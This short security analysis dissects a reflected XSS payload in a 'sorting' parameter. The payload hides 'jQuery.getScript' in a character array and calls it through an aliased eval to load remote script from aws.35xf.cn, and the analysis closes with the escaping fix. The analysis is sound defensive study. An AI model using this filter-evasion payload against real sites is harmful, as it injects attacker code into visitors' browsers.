XSS: disguising the function a script calls to bypass an XSS filter

  • Injected XSS, as sent (URL-encoded)
...
&sorting=%27;var%20a=[%27j%27,%27Q%27,%27u%27,%27e%27,%27r%27,%27y%27,%27.%27,%27g%27,%27e%27,%27t%27,%27S%27,%27c%27,%27r%27,%27i%27,%27p%27,%27t%27],b=eval,c=b(a.join(%27%27));c(%27http://aws.35xf.cn/bridge/b.js%27);;%27
...
  • Injected XSS, decoded
...
&sorting=';var a=['j','Q','u','e','r','y','.','g','e','t','S','c','r','i','p','t'],b=eval,c=b(a.join(''));c('http://aws.35xf.cn/bridge/b.js');;'
...
  • Analysis of the injected XSS
    The leading `';` and trailing `;'` indicate that the `sorting` value is reflected into a single-quoted JavaScript string literal inside an inline script: the first `';` closes that string and its statement, and the final `;'` reopens a string so the rest of the page's script still parses. Between them, the payload never contains the token `jQuery.getScript`, which is what the filter matches on.
    1. Split the name of the script-loading function into a character array -- a (the identifier never appears as a whole in the request)
      var a=['j','Q','u','e','r','y','.','g','e','t','S','c','r','i','p','t']
    2. Alias eval -- b (calling eval through an alias is an indirect eval, so the string is resolved in the global scope, where jQuery lives)
      b=eval
    3. Reassemble the name and resolve it to the real function object -- c (c is now jQuery.getScript itself)
      c=b(a.join(''))
    4. Call c to fetch and execute the remote JS -- c(js)
      c('http://aws.35xf.cn/bridge/b.js')
    The filter is defeated because it inspects the request text for dangerous identifiers, while the identifier only comes into existence after the page's own script has run. A longer blocklist does not help (eval itself can be reached the same way, e.g. through a concatenated property name); the fix is to escape the value for the JavaScript-string context it is reflected into, so the initial `'` can never terminate the literal.